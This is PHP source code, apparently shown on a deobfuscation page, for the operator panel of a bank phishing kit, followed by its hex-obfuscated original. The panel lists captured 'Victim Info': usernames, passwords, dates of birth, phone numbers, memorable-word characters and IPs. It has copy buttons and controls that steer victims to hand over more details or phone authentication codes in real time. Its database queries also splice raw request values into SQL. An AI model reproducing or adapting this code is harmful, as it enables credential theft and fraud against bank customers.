\x9	\x9\x9\x9\x9		\x9		</td>\xa	\x9\x9\x9	\x9	\x9	\x9	<td>
								\x9			<div class='form-check'>\xa		\x9			\x9	\x9\x9			<label for='finishradio{$value["id"]}' class='form-check-label'>
				\x9		\x9\x9\x9\x9\x9\x9	<input type='radio' name='status' value='20' id='finishradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
		\x9\x9		\x9			\x9	\x9\x9<span>Finish</span>
	\x9				\x9\x9		\x9\x9	</label>
\x9\x9				\x9					</div>\xa	\x9			\x9			\x9\x9</td>
\x9						\x9	\x9</tr>\xa	\x9\x9\x9\x9\x9\x9	\x9\x9
\x9\x9\x9\x9		\x9			<tr>
	\x9			\x9	\x9			<td>
	\x9\x9	\x9\x9		\x9\x9		<div class='form-check'>\xa\x9\x9\x9\x9		\x9	\x9\x9\x9\x9\x9<label for='sendawayradio{$value["id"]}' class='form-check-label'>\xa\x9	\x9		\x9\x9		\x9\x9\x9		<input type='radio' name='status' value='100' id='sendawayradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa	\x9		\x9	\x9		\x9				<span>Invalid, Send away</span>
	\x9\x9				\x9\x9	\x9\x9	</label>\xa		\x9	\x9	\x9	\x9\x9\x9\x9</div>
\x9	\x9	\x9\x9\x9		\x9\x9</td>\xa			\x9	\x9\x9		\x9</tr>\xa\xa\x9	\x9	\x9	\x9\x9\x9</tbody>\xa\x9		\x9	\x9	\x9</table>
\x9\x9\x9\x9			</div>
\x9\x9\x9\x9\x9\x9\x9<!-- End commands edit -->
\xa\x9\x9\x9	\x9\x9	<div class='modal-footer' style='margin-top:-40px'>\xa\x9\x9\x9				\x9<button type='button' class='btn btn-secondary' onclick='close_btn()' data-dismiss='modal'>Close</button>
\x9					\x9\x9<button id='save_{$value["id"]}' onclick='form_submit(this)' type='button' class='btn btn-primary'>Save</button>
\x9\x9	\x9	\x9	</div>
	\x9	\x9\x9	</div>\xa\x9\x9\x9		</div>
		\x9	</form>
\x9\x9	</div>
	\x9\x9"; } } if (isset($_GET["fetch_pc_finish_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $memchar1 = $value["memchar1"]; $memchar2 = $value["memchar2"]; $memchar3 = $value["memchar3"]; $askchar1 = $value["askchar1"]; $askchar2 = $value["askchar2"]; $askchar3 = $value["askchar3"]; $phonenum = $value["phonenum"]; $fullmemo = $value["fullmemo"]; $usrdob = $value["usrdob"]; $Char_one = $askchar1 . " character - " . $memchar1; $Char_two = $askchar2 . " character - " . $memchar2; $Char_three = $askchar3 . " character - " . $memchar3; $expiry = $value["expiry"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); $data_log = "\xa\x9\x9\x9=====\342\x89\253 LOGIN \342\211\xaa=====\xa		\x9User ID/No. : {$usrlogin}
	\x9	Pass : {$usrpass}
		\x9Phone No : {$phonenum}\xa	\x9\x9DOB : {$usrdob}
\x9	\x9=====\342\x89\xab SECURITY \xe2\x89\xaa=====\xa\x9		{$Char_one}\xa		\x9{$Char_two}\xa		\x9{$Char_three}
		\x9Full Memo : {$fullmemo}\xa			===============================\xa	\x9	IP : {$ip}
\x9\x9\x9UA : {$useragent}
\x9\x9	==============================="; echo "\xa\x9\x9	\xa\x9	\x9<div class='modal fade' id='viewmodal_userid_{$value["id"]}' tabindex='-1' role='dialog' aria-labelledby='exampleModalLabel' style='opacity:1 !important;display:none;height:100%;overflow:scroll;' aria-hidden='true'>
			\xa\x9\x9\x9\x9<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>\xa					<input type='hidden' name='userid' value='{$value["id"]}'>
\x9				<div class='modal-dialog' role='document' style='width:500px'>\xa\x9		\x9	\x9<div class='modal-content'>\xa\x9		\x9\x9		<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>\xa\x9	\x9\x9\x9\x9		<h5 class='modal-title' id='exampleModalLabel' style='color:white'>Victim Info</h5>
		\x9	\x9		\x9<button type='button' class='close' data-dismiss='modal' aria-label='Close'>\xa\x9\x9		\x9				<span aria-hidden='true' style='color:white'>&times;</span>
	\x9		\x9\x9		</button>
\x9\x9\x9\x9\x9	\x9</div>
		\x9\x9			<div class='modal-body'>
					\x9\x9	<div class='form-group'>\xa		\x9			\x9\x9\x9<br>\xa	\x9	\x9					<textarea id='textareafinish' class='form-control' disabled='disabled' rows='12'>{$data_log}</textarea>\xa\x9			\x9		\x9</div>
\x9			\x9\x9\x9</div>\xa	\x9	\x9	\x9	<div class='modal-footer' style='margin-top:-40px'>
			\x9\x9	\x9\x9<button type='button' class='btn btn-lg btn-dark col-12' onclick='close_btn()'>CLOSE</button>\xa\x9\x9\x9			\x9</div>\xa\x9		\x9\x9\x9</div>
	\x9\x9\x9	</div>
\x9\x9\x9	</form>
\x9		</div>\xa\x9\x9\x9"; } } if (isset($_GET["fetch_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $memchar1 = $value["memchar1"]; $memchar2 = $value["memchar2"]; $memchar3 = $value["memchar3"]; $askchar1 = $value["askchar1"]; $askchar2 = $value["askchar2"]; $askchar3 = $value["askchar3"]; $phonenum = $value["phonenum"]; $fullmemo = $value["fullmemo"]; $usrdob = $value["usrdob"]; $Char_one = $askchar1 . " character - " . $memchar1; $Char_two = $askchar2 . " character - " . $memchar2; $Char_three = $askchar3 . " character - " . $memchar3; $expiry = $value["expiry"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); echo "
	\xa\x9\x9	<div class='modal fade' id='modal_userid_{$value["id"]}' tabindex='-1' role='dialog' style='opacity:1 !important;display:none;height:100%;overflow:scroll;' aria-labelledby='exampleModalLabel' aria-hidden='true'>\xa\x9		
	\x9\x9	<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>
			\x9	<input type='hidden' name='userid' value='{$value["id"]}'>\xa\x9	\x9\x9\x9<div class='modal-dialog' role='document' style='margin-top:20%;max-width:100%;font-size:1.2rem;'>\xa\x9\x9		\x9	<div class='modal-content' style='background-color: black;'>
\x9					\x9<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>
		\x9\x9\x9\x9\x9	<h5 class='modal-title' id='exampleModalLabel' style='color:white;font-size:1.2rem'>Admin Control (click on log to auto-copy)</h5>
			\x9	\x9	\x9<button type='button' class='close' onclick='close_btn()'  aria-label='Close'>\xa\x9		\x9\x9\x9	\x9\x9<span aria-hidden='true' style='color:white'>&times;</span>
\x9		\x9\x9\x9\x9	</button>\xa	\x9	\x9			</div>
						\x9<div class='modal-body'>
\x9\x9		\x9\x9\x9\x9<div class='form-group' style='margin-bottom:1rem'>
			\x9\x9\x9	\x9	<br>\xa\x9\x9					\x9\x9
\x9	\x9					\x9<div class='data-group'>
\x9	\x9	\x9\x9	\x9\x9	<label class='data-label'>User ID</label>
	\x9\x9\x9\x9	\x9\x9\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrlogin}'>
\x9		\x9\x9		\x9	</div>\xa	\x9\x9	\x9	\x9		<div class='data-group'>\xa	\x9\x9\x9		\x9\x9		<label class='data-label'>Pass</label>
	\x9\x9	\x9\x9\x9			<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrpass}'>
\x9	\x9\x9	\x9\x9	\x9</div>
			\x9\x9	\x9\x9	<div class='data-group'>\xa\x9\x9\x9\x9\x9\x9				<label class='data-label'>DOB</label>
		\x9\x9	\x9	\x9		<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrdob}'>\xa	\x9	\x9		\x9	\x9</div>
				\x9\x9\x9		<div class='data-group'>
				\x9		\x9\x9\x9<label class='data-label'>Phone No.</label>
		\x9							<input onclick='copy_btn(this)' class='form-control' readonly value='{$phonenum}'>\xa	\x9\x9\x9\x9\x9\x9		</div>
						\x9		<div class='data-group'>
\x9	\x9	\x9\x9	\x9\x9\x9<label class='data-label'>Char 1</label>\xa\x9\x9\x9\x9\x9\x9\x9	\x9	<input onclick='copy_btn(this)' class='form-control' readonly value='{$Char_one}'>
	\x9			\x9\x9		</div>\xa						\x9		<div class='data-group'>\xa	\x9				\x9	\x9	<label class='data-label'>Char 2</label>
\x9\x9		\x9			\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$Char_two}'>
\x9\x9\x9	\x9\x9		\x9</div>\xa		\x9\x9\x9\x9	\x9\x9<div class='data-group'>
\x9\x9\x9\x9\x9		\x9	\x9<label class='data-label'>Char 3</label>\xa\x9\x9\x9	\x9\x9\x9\x9\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$Char_three}'>
\x9		\x9		\x9\x9\x9</div>\xa\x9	\x9\x9		\x9\x9\x9<div class='data-group'>\xa	\x9	\x9\x9				\x9<label class='data-label'>Full Memo</label>\xa\x9		\x9	\x9\x9		\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$fullmemo}'>\xa\x9\x9	\x9\x9	\x9\x9	</div>
\x9\x9		\x9			\x9<div class='data-group'>
					\x9\x9	\x9	<label class='data-label'>IP/Device</label>
\x9\x9			\x9\x9\x9\x9	<input onclick='copy_btn(this)' class='form-control' readonly value='{$ip} [{$useragent}]'>
		\x9\x9			\x9\x9</div>
	\x9\x9	\x9				<br>
\x9\x9	\x9\x9	\x9	</div>
\xa	\x9\x9	\x9\x9	\x9<!-- END -->

\x9					\x9\x9<table style='width: 100%;background-color: black;color: white;padding: 10%;'>
\x9\x9	\x9\x9		\x9\x9<tbody style='line-height:100%;'>
		\x9	\x9	\x9		
\x9\x9\x9	\x9		\x9		<tr>
\x9\x9		\x9\x9		\x9\x9\x9<td>
			\x9\x9			\x9		\x9<div class='form-check'>
\x9			\x9\x9\x9\x9	\x9	\x9	<label for='askcharsradio0{$value["id"]}' class='form-check-label'>
\x9\x9\x9\x9\x9	\x9\x9\x9\x9			\x9<input type='radio' name='status' value='11' id='askcharsradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa	\x9\x9		\x9	\x9		\x9		\x9<span>Request Memorable</span>
		\x9		\x9\x9	\x9\x9		\x9</label>\xa	\x9\x9	\x9							</div>
		\x9\x9	\x9\x9			\x9	<!-- Input characters -->
		\x9\x9\x9\x9	\x9	\x9	\x9<div class='form-group' style='display:none;' id='askchars0{$value["id"]}'>
\x9		\x9\x9\x9						\x9<div class='row' style='margin-left:5%;margin-top:5px' >
					\x9		\x9	\x9		\x9<div class='col'>
\x9\x9	\x9			\x9\x9\x9	\x9\x9		<input type='text' class='form-control' placeholder='E.g 1st' name='askchar1' id='askchar1' style='width:80%;border-color:#d6d6e5'>
\x9		\x9	\x9\x9\x9	\x9	\x9		</div>\xa\x9	\x9		\x9\x9\x9\x9	\x9\x9\x9	<div class='col'>
	\x9\x9						\x9\x9\x9\x9\x9\x9<input type='text' class='form-control' placeholder='E.g 3rd' name='askchar2' id='askchar2' style='width:80%;border-color:#d6d6e5'>\xa\x9\x9			\x9\x9\x9\x9\x9\x9\x9		</div>\xa\x9\x9		\x9\x9		\x9\x9	\x9\x9\x9<div class='col'>
\x9\x9\x9\x9				\x9		\x9\x9\x9\x9<input type='text' class='form-control' placeholder='E.g 6th' name='askchar3' id='askchar3' style='width:80%;border-color:#d6d6e5'>
\x9\x9\x9\x9\x9		\x9		\x9		\x9</div>
\x9		\x9				\x9			\x9</div>
\x9\x9	\x9\x9\x9	\x9\x9			</div>\xa			\x9\x9						</td>\xa							\x9\x9\x9	<td>\xa\x9	\x9	\x9\x9\x9\x9\x9\x9		<div class='form-check'>
\x9				\x9\x9\x9\x9			\x9<label for='askcharsradio1{$value["id"]}' class='form-check-label'>\xa\x9		\x9\x9\x9		\x9\x9	\x9\x9\x9<input type='radio' name='status' value='12' id='askcharsradio1{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
			\x9					\x9\x9	\x9	<span>Request to call </span>\xa	\x9	\x9\x9				\x9		\x9</label>
			\x9\x9\x9\x9	\x9		\x9</div>\xa			\x9		\x9\x9\x9		\x9<!-- Input characters -->\xa\x9\x9			\x9	\x9\x9	\x9	<div class='form-group' style='display:none;' id='askchars1{$value["id"]}'>
\x9\x9\x9\x9\x9				\x9		\x9<div class='row' style='margin-left:5%;margin-top:5px' >\xa		\x9\x9	\x9			\x9\x9		\x9<div class='col'>
			\x9\x9\x9	\x9	\x9	\x9			<input type='text' class='form-control' placeholder='e.g 07123489322' name='callnum' id='callnum' style='width:80%;border-color:#d6d6e5'>
\x9	\x9							\x9	\x9	</div>\xa		\x9\x9		\x9			\x9	\x9</div>\xa\x9\x9	\x9\x9\x9	\x9	\x9	\x9</div>
	\x9	\x9	\x9\x9\x9\x9	\x9</td>
	\x9	\x9		\x9\x9\x9	</tr>\xa	\x9	\x9		\x9	\x9	
			\x9					\x9<tr>\xa\x9				\x9		\x9\x9\x9<td>
	\x9	\x9	\x9\x9	\x9\x9		<div class='form-check'>
\x9	\x9	\x9\x9\x9\x9	\x9\x9\x9	<label for='askcharsradio2{$value["id"]}' class='form-check-label'>\xa\x9\x9		\x9	\x9				\x9		<input type='radio' name='status' value='13' id='askcharsradio2{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9	\x9									\x9	<span>Phone call Auth </span>\xa\x9		\x9\x9	\x9\x9	\x9\x9	\x9</label>\xa	\x9\x9	\x9	\x9	\x9	\x9\x9</div>
\x9\x9	\x9\x9		\x9\x9	\x9\x9<!-- Input characters -->\xa	\x9	\x9\x9\x9	\x9	\x9\x9\x9<div class='form-group' style='display:none;' id='askchars2{$value["id"]}'>
\x9\x9\x9\x9\x9\x9\x9\x9	\x9\x9		<div class='row' style='margin-left:5%;margin-top:5px' >\xa\x9		\x9\x9		\x9			\x9	\x9<div class='col'>
\x9\x9\x9	\x9\x9\x9\x9			\x9\x9\x9	<input type='text' class='form-control' placeholder='Enter code here' name='call_code' id='call_code' style='width:80%;border-color:#d6d6e5'>\xa		\x9\x9\x9\x9	\x9\x9			\x9\x9</div>\xa	\x9	\x9\x9	\x9\x9		\x9	\x9</div>\xa\x9\x9	\x9\x9\x9			\x9\x9	</div>\xa			\x9			\x9	\x9	</td>\xa\x9	\x9					\x9\x9	<td>\xa		\x9			\x9\x9\x9\x9	\x9<div class='form-check'>
\x9\x9\x9\x9	\x9				\x9	\x9<label for='askcharsradio3{$value["id"]}' class='form-check-label'>\xa	\x9				\x9		\x9	\x9		<input type='radio' name='status' value='14' id='askcharsradio3{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
	\x9\x9		\x9	\x9			\x9\x9	<span>Request Phone No.</span>\xa\x9\x9							\x9			</label>\xa\x9\x9\x9	\x9		\x9	\x9		</div>\xa	\x9\x9\x9\x9			\x9		</td>\xa\x9			\x9\x9				</tr>
		\x9\x9	\x9\x9\x9		
	\x9			\x9	\x9	\x9<tr>\xa	\x9\x9	\x9\x9\x9\x9	\x9	<td>\xa	\x9\x9	\x9	\x9\x9\x9\x9		<div class='form-check'>
		\x9\x9						\x9\x9	<label for='askcharsradio4{$value["id"]}' class='form-check-label'>\xa\x9			\x9\x9\x9\x9	\x9\x9\x9		<input type='radio' name='status' value='15' id='askcharsradio4{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
		\x9	\x9\x9\x9\x9\x9\x9			\x9<span>Request Full Memo </span>
\x9\x9			\x9\x9\x9		\x9\x9\x9</label>\xa		\x9\x9			\x9\x9	\x9	</div>
\x9\x9\x9\x9\x9\x9	\x9			</td>
		\x9\x9\x9	\x9\x9		\x9<td>\xa\x9			\x9\x9		\x9	\x9	<div class='form-check'>\xa\x9\x9	\x9\x9\x9\x9				\x9	<label for='askcharsradio5{$value["id"]}' class='form-check-label'>\xa			\x9\x9\x9	\x9				\x9	<input type='radio' name='status' value='16' id='askcharsradio5{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9	\x9\x9\x9\x9	\x9\x9\x9\x9\x9\x9	<span>Request DOB </span>
	\x9		\x9	\x9\x9		\x9\x9	</label>\xa\x9\x9			\x9					\x9</div>\xa		\x9\x9			\x9\x9\x9\x9</td>
	\x9\x9\x9\x9\x9	\x9	\x9</tr>
	\x9\x9			\x9\x9		\xa\x9	\x9\x9\x9		\x9\x9	<tr>
	\x9\x9\x9\x9	\x9\x9			<td>
				\x9	\x9	\x9			<div class='form-check'>
\x9\x9				\x9						<label for='askloginradio{$value["id"]}' class='form-check-label'>
	\x9	\x9				\x9\x9\x9		\x9<input type='radio' name='status' value='50' id='askloginradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9\x9	\x9	\x9	\x9		\x9\x9	\x9<span>Request login again </span>
		\x9\x9\x9	\x9	\x9		\x9	</label>\xa	\x9		\x9\x9		\x9		\x9</div>
\x9\x9\x9	\x9					\x9</td>\xa	\x9\x9\x9\x9		\x9			<td>\xa\x9\x9\x9	\x9	\x9	\x9		\x9<div class='form-check'>
	\x9\x9\x9\x9		\x9\x9	\x9\x9	<label for='finishradio{$value["id"]}' class='form-check-label'>
		\x9	\x9\x9\x9\x9		\x9	\x9\x9<input type='radio' name='status' value='20' id='finishradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9		\x9	\x9\x9	\x9	\x9	\x9	<span>Finish</span>\xa\x9\x9\x9		\x9	\x9		\x9\x9	</label>\xa\x9		\x9\x9\x9\x9\x9		\x9\x9</div>\xa	\x9\x9		\x9				\x9</td>
					\x9	\x9		</tr>\xa				\x9\x9	\x9\x9\x9\xa\x9\x9\x9\x9\x9\x9	\x9	\x9<tr>\xa\x9\x9						\x9\x9	<td>
\x9	\x9\x9\x9\x9		\x9\x9\x9\x9<div class='form-check'>
\x9\x9\x9			\x9\x9		\x9\x9	<label for='sendawayradio{$value["id"]}' class='form-check-label'>\xa\x9		\x9				\x9\x9		\x9	<input type='radio' name='status' value='100' id='sendawayradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9\x9	\x9\x9\x9	\x9		\x9		\x9<span>Invalid, Send away</span>
\x9\x9		\x9\x9	\x9			\x9\x9</label>
\x9	\x9		\x9\x9\x9\x9\x9\x9\x9</div>
	\x9\x9	\x9	\x9\x9\x9\x9	</td>\xa	\x9\x9		\x9\x9\x9		</tr>\xa\xa	\x9	\x9		\x9		</tbody>\xa\x9		\x9	\x9		</table>
	\x9	\x9\x9	\x9</div>\xa\x9	\x9\x9		\x9<!-- End commands edit -->\xa	\x9\x9\x9\x9	\x9<div class='modal-footer' style='margin-top:-40px'>\xa			\x9				<button type='button' class='btn btn-secondary' onclick='close_btn()' >Close</button>
\x9\x9	\x9\x9	\x9	<button id='save_{$value["id"]}' onclick='form_submit(this)' type='button' class='btn btn-primary'>Save</button>\xa\x9	\x9\x9\x9\x9	</div>
\x9\x9	\x9\x9\x9</div>\xa	\x9\x9\x9	</div>
	\x9		</form>\xa\x9	\x9</div>\x9\x9\x9
\x9		\xa	\x9	"; } } if (isset($_GET["fetch_finish_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $memchar1 = $value["memchar1"]; $memchar2 = $value["memchar2"]; $memchar3 = $value["memchar3"]; $askchar1 = $value["askchar1"]; $askchar2 = $value["askchar2"]; $askchar3 = $value["askchar3"]; $phonenum = $value["phonenum"]; $fullmemo = $value["fullmemo"]; $usrdob = $value["usrdob"]; $Char_one = $askchar1 . " character - " . $memchar1; $Char_two = $askchar2 . " character - " . $memchar2; $Char_three = $askchar3 . " character - " . $memchar3; $expiry = $value["expiry"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); echo "
\x9\xa\x9	\x9<div class='modal fade' id='viewmodal_userid_{$value["id"]}' tabindex='-1' role='dialog' style='opacity:1 !important;display:none;height:100%;overflow:scroll;' aria-labelledby='exampleModalLabel' aria-hidden='true'>\xa	\x9\x9
\x9		\x9<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>
	\x9\x9\x9<input type='hidden' name='userid' value='{$value["id"]}'>
\x9		\x9<div class='modal-dialog' role='document' style='margin-top:20%;max-width:100%;font-size:1.2rem;'>\xa		\x9	<div class='modal-content' style='background-color: black;'>
\x9				<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>
\x9		\x9	<h5 class='modal-title' id='exampleModalLabel' style='color:white;font-size:1.2rem'>Admin Control (click on log to auto-copy)</h5>\xa\x9\x9\x9	\x9<button type='button' class='close' onclick='close_btn()'  aria-label='Close'>\xa	\x9\x9		\x9<span aria-hidden='true' style='color:white'>&times;</span>\xa		\x9\x9\x9</button>\xa\x9\x9		\x9</div>\xa	\x9\x9		<div class='modal-body'>\xa	\x9			\x9<div class='form-group' style='margin-bottom:1rem'>\xa\x9		\x9	\x9	<br>
\xa		\x9				<div class='data-group'>
	\x9\x9		\x9		<label class='data-label'>User ID</label>
\x9	\x9\x9	\x9		<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrlogin}'>\xa\x9\x9\x9\x9	\x9\x9</div>
	\x9	\x9\x9\x9	<div class='data-group'>
		\x9	\x9		\x9<label class='data-label'>Pass</label>\xa	\x9	\x9\x9\x9	\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrpass}'>\xa	\x9	\x9\x9\x9	</div>
		\x9\x9		\x9<div class='data-group'>
\x9							<label class='data-label'>DOB</label>\xa\x9			\x9			<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrdob}'>\xa	\x9			\x9	</div>
\x9				\x9	<div class='data-group'>\xa\x9	\x9\x9		\x9\x9<label class='data-label'>Phone No.</label>
		\x9	\x9\x9\x9	<input onclick='copy_btn(this)' class='form-control' readonly value='{$phonenum}'>\xa\x9\x9	\x9\x9\x9\x9</div>\xa		\x9		\x9	<div class='data-group'>\xa	\x9		\x9	\x9\x9<label class='data-label'>Char 1</label>
		\x9\x9\x9\x9		<input onclick='copy_btn(this)' class='form-control' readonly value='{$Char_one}'>\xa			\x9		\x9</div>
\x9\x9\x9	\x9\x9\x9<div class='data-group'>\xa\x9\x9\x9		\x9\x9\x9<label class='data-label'>Char 2</label>
	\x9			\x9\x9	<input onclick='copy_btn(this)' class='form-control' readonly value='{$Char_two}'>\xa\x9\x9	\x9\x9\x9	</div>\xa\x9	\x9\x9	\x9	<div class='data-group'>
\x9\x9		\x9	\x9\x9<label class='data-label'>Char 3</label>
	\x9			\x9\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$Char_three}'>\xa\x9	\x9	\x9\x9	</div>\xa\x9			\x9		<div class='data-group'>\xa	\x9\x9\x9\x9\x9		<label class='data-label'>Full Memo</label>\xa\x9	\x9\x9\x9	\x9	<input onclick='copy_btn(this)' class='form-control' readonly value='{$fullmemo}'>
	\x9\x9\x9\x9	\x9</div>\xa\x9					\x9<div class='data-group'>\xa\x9\x9			\x9\x9	<label class='data-label'>IP/Device</label>\xa	\x9		\x9	\x9	<input onclick='copy_btn(this)' class='form-control' readonly value='{$ip} [{$useragent}]'>
\x9			\x9		</div>\xa\x9	\x9	\x9		<br>
	\x9\x9	\x9	</div>\xa\x9\x9\x9	\x9	\x9\xa\x9\x9	\x9	\x9<!-- END -->
	\x9			
\x9	\x9		<div class='modal-footer' style='margin-top:-40px'>\xa\x9	\x9	\x9<button style='color:black;background-color:white' type='button' onclick='close_btn()' class='btn btn-lg btn-dark col-12' >CLOSE</button>\xa			\x9	\xa\x9\x9		\x9</div>\xa\x9\x9	\xa\x9\x9\x9</div>\xa			\xa	\x9	</div>\xa\x9		</div>\xa\x9	\x9</div>\xa	\x9\x9</form>
	\x9\x9</div>\xa	\x9\x9"; } } if (isset($_GET["counter"])) { $ipFile = "../../logs/visits.txt"; $activequery = mysqli_query($conn, "SELECT * FROM customers WHERE status <20"); $completequery = mysqli_query($conn, "SELECT * FROM customers WHERE status=20"); if ($activequery and $completequery) { $userRows = count(file($ipFile)); $activeRows = mysqli_num_rows($activequery); $completeRows = mysqli_num_rows($completequery); $stats = array("usernum" => $userRows, "activenum" => $activeRows, "completednum" => $completeRows); echo json_encode($stats); } else { echo json_encode(array("stats" => "error")); } } if (isset($_GET["visitlog"])) { $ipFile = "../../logs/visitors.txt"; $logquery = file_get_contents($ipFile, true); if ($logquery) { $log = array("visitorlog" => $logquery); echo json_encode($log); } else { echo json_encode(array("stats" => "error")); } } if (isset($_GET["buzzoff"])) { $query = mysqli_query($conn, "SELECT * FROM customers WHERE status<=8"); if ($query) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); foreach ($array as $value) { $userid = $value["id"]; $queryy = mysqli_query($conn, "UPDATE customers SET buzzed=1 WHERE id={$userid}"); if ($queryy) { $stat = "ok"; } else { $stat = "notok"; } } if ($stat == "ok") { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notok")); } } if ($_GET["type"] == "delete") { if ($_POST["userid"] and numeric($_POST["userid"]) == true) { $userid = $_POST["userid"]; $query = mysqli_query($conn, "DELETE FROM customers WHERE id={$userid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notokk")); } } if ($_GET["type"] == "submitted") { if ($_POST["userid"] and numeric($_POST["userid"]) == true) { $userid = $_POST["userid"]; $status = str_replace("_{$userid}", '', $_POST["status"]); if ($status == "accept") { $status = 11; } elseif ($status == "reject") { $status = 12; } else { echo json_encode(array("status" => "notok")); } $query = mysqli_query($conn, "UPDATE customers SET status={$status} WHERE id={$userid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notokk")); } } } goto MUtFt; VEIzH: ?>

Did this file decode correctly?

Original Code

 goto n1XJz; MUtFt: if ($_SESSION["\x73\164\x61\162\164\145\x64"] == "\164\x72\165\145") { if ($_GET["\147\x65\x74\163\164\141\164\165\x73"] and numeric($_GET["\147\145\164\x73\164\x61\164\165\163"]) == true) { $id = $_GET["\x67\x65\164\x73\x74\x61\164\x75\x73"]; $query = mysqli_query($conn, "\x53\105\x4c\x45\103\124\40\52\40\x66\162\157\x6d\40\x63\x75\163\164\x6f\155\x65\x72\x73\x20\x57\110\x45\122\105\x20\x75\x6e\x69\x71\x75\x65\x69\144\x3d\x27{$id}\x27"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["\x73\x74\x61\164\165\163"]; } } if ($_GET["\x67\x65\164\103\157\x64\145"] and numeric($_GET["\x67\x65\x74\x43\x6f\144\x65"]) == true) { $id = $_GET["\x67\x65\164\x43\x6f\144\145"]; $query = mysqli_query($conn, "\x53\105\114\105\103\124\40\52\40\x66\162\157\155\x20\x63\x75\x73\x74\157\x6d\145\162\163\40\127\x48\x45\122\x45\40\165\x6e\151\x71\165\145\151\144\75\47{$id}\47"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); if ($array) { echo json_encode(array("\163\164\141\164\x75\163" => "\157\x6b", "\x63\x61\154\x6c\137\x63\x6f\144\x65" => $array["\143\x61\x6c\x6c\x5f\143\157\x64\145"])); } else { echo json_encode(array("\163\x74\141\164\x75\163" => "\103\157\144\145\x20\x45\x72\x72\157\162")); } } } if ($_GET["\x74\x79\x70\145"] == "\x4d\145\x6d\x43\x68\x61\162") { if ($_POST["\x6d\x65\x6d\x63\x68\x61\162\x31"] and $_POST["\155\x65\x6d\x63\x68\141\162\62"] and $_POST["\155\145\155\x63\x68\141\x72\63"] and $_POST["\x75\x73\x65\162\151\x64"] and numeric($_POST["\165\x73\x65\x72\151\144"]) == true) { $memchar1 = $_POST["\x6d\x65\x6d\143\150\x61\162\x31"]; $memchar2 = $_POST["\x6d\x65\x6d\x63\x68\141\x72\x32"]; $memchar3 = $_POST["\155\x65\x6d\x63\x68\141\162\x33"]; $comment = "\x4d\145\x6d\x6f\40\x63\150\141\x72\x61\143\x74\145\162\163\x20\105\156\164\145\162\x65\x64\54\40\x75\163\145\162\x20\167\141\151\x74\151\156\x67"; $uniqueid = $_POST["\165\163\145\162\x69\144"]; $query = mysqli_query($conn, "\x55\x50\x44\101\124\x45\40\143\165\x73\164\157\155\x65\162\x73\40\x53\x45\x54\x20\x6d\145\x6d\x63\150\x61\162\61\75\x27{$memchar1}\x27\x2c\40\x6d\x65\x6d\x63\150\x61\162\x32\75\x27{$memchar2}\x27\54\x20\x6d\145\x6d\x63\150\x61\x72\x33\x3d\47{$memchar3}\47\x2c\40\x63\157\155\x6d\x65\x6e\164\x3d\47{$comment}\x27\54\40\x73\x74\x61\x74\165\163\x3d\62\x2c\x20\x62\x75\172\172\x65\x64\x3d\x30\x20\x57\x48\105\x52\105\40\x75\156\x69\161\165\145\x69\x64\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\163\x74\x61\164\x75\163" => "\157\153")); } else { echo json_encode(array("\x73\x74\141\x74\165\x73" => "\103\103\x20\x45\x72\162\157\x72")); } } } if ($_GET["\164\x79\160\145"] == "\x43\141\x6c\154\x4d\145") { if ($_POST["\165\163\145\x72\x69\x64"] and 